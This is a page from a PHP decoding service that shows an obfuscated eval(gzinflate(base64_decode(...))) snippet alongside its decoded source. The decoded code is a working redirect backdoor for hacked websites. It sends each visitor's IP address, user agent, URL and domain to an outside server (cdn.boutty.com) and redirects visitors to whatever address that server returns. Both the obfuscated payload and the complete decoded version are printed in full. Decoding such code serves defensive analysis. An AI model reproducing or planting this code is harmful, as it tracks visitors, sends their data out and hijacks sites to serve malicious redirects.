Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<? eval(gzinflate(base64_decode(' jVVbb9owFH5H4j94VSQnEgONXVVGUUXTFokBC0lf UGWliSmegp3Zz..

Decoded Output download

?><?php

function get_client_ip() {
    $ip = $_SERVER['REMOTE_ADDR'];
    if (isset($_SERVER['HTTP_CF_CONNECTING_IP'])) {
        $ip = $_SERVER['HTTP_CF_CONNECTING_IP'];
    }
    return $ip;
}

$client_ip = get_client_ip();

function get_client_domain() {
    $domain = $_SERVER['HTTP_HOST'];
    if (isset($_SERVER['HTTP_CF_VISITOR'])) {
        $cf_visitor = json_decode($_SERVER['HTTP_CF_VISITOR'], true);
        if (isset($cf_visitor['host'])) {
            $domain = $cf_visitor['host'];
        }
    }
    return $domain;
}

$client_domain = get_client_domain();

$uri = isset($_SERVER['HTTP_CF_REQUEST_URI']) ? $_SERVER['HTTP_CF_REQUEST_URI'] : $_SERVER['REQUEST_URI'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$data = $client_ip . '|' . $user_agent . '|' . $uri . '|' . $client_domain;
$md5 = '278';
$encoded_data = base64_encode($md5 . $data);
$url = 'https://cdn.boutty.com/index.php';
$data = array('encoded_data' => $encoded_data);
$options = array(
    CURLOPT_URL => $url,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query($data),
    CURLOPT_RETURNTRANSFER => true,
);
$curl = curl_init();
curl_setopt_array($curl, $options);
$result = curl_exec($curl);
curl_close($curl);

if ($result !== 'sai') {
    header("Location: " . $result);
    exit;
} else {
    $pathParts = explode('/', $uri);
    if (count($pathParts) >= 3) {
        $path2 = $pathParts[2];
        $trimmedPath2 = rtrim($path2, $path2[strlen($path2) - 1]);
        $pathParts[2] = $trimmedPath2;
    }
    $newUri = implode('/', $pathParts);
    $fullUrl = 'https://' . $client_domain . $newUri;
    $content = file_get_contents($fullUrl);
    echo $content;

    exit;
}

 
?><?

Did this file decode correctly?

Original Code

<? eval(gzinflate(base64_decode('
jVVbb9owFH5H4j94VSQnEgONXVVGUUXTFokBC0lf
UGWliSmegp3Zzka19b/PFwgJ0G08gHwu3znfuTG4
+DzIV3mz0WwsC5pIwih4xBIlGcFUIpK7HvjVbAD1
cUgO+sBBcz+484MFDPwv09BHl1dXAbzvWRuyBC4R
Akt3b3cbhjM0vEbD6WTiD8PR5AaNZvDeK4FPgb/g
tA3zbH84lgWn2lfJnzUHp8xboR3w6L1EMmXrmNAK
USs4zud2Og//i+rdaD4Kp8ERyWSJfhBBJOMK/Jtg
FKU4YSn+G0QLSF5gr7eHqUTeAy7gigl5GPGAzrF5
Bfb5ZG2t82F9S8gTZTR1dgpOlPqlAgX+18ifhygK
RiplMAD/MAHntcGraHo6lsAcxY8qieOeReqFLm/8
ie2ck8YyNqUoB6UN4G+ovqswe5miUT5qRDXYOn2v
sGD34yeon5jqZqZoG+MhFvjDO2SlrjFWIFrpmax5
pp1XUubivNNJUtp+YIWUT+2ErTuEpnjTVqsJK1nH
nMdPLqzGgaB/AWqRDTjL9ZSL0sc2dRgF4+lMV25s
3FQKrbpmpkZcq/TMnVBdj/zx1Vwb6LTRQ0GyFH0v
MH9yLbEDn8APo2ASBpeT+bUfVIBNkoktgf5BhBJp
Zse81NQoBsjmbuxaYMfJuHIsikzunPEGJ9asREgy
JvBe1mzordm5veqrwouYwHJZVjhOMXfPxiyJdZRz
cKabZe13y4c3ROpNADgTuLwWeSxXs5hLXWy8yTPd
bNiBLTM8XuVaJKygahlKew9c9MHb+oXQyq6ez9Jq
0a0uqSM5Wa9xOtvacf22mN3W1n0hJM8w3Uo98Bq8
ua/ejxq2jlXFrF9Yh+Kfkd3kdZXZnsPW3lkWWRbV
J/p4Z7TAIu7cEkal3dslyTAy58SKhLvDLMufrFjp
YXpabYp5NxsD9Yf2Bw==
'))); ?>

Function Calls

gzinflate 1
base64_decode 1

Variables

None

Stats

MD5 32fdaa1ee39e9f253ee829169ebefe2d
Eval Count 1
Decode Time 51 ms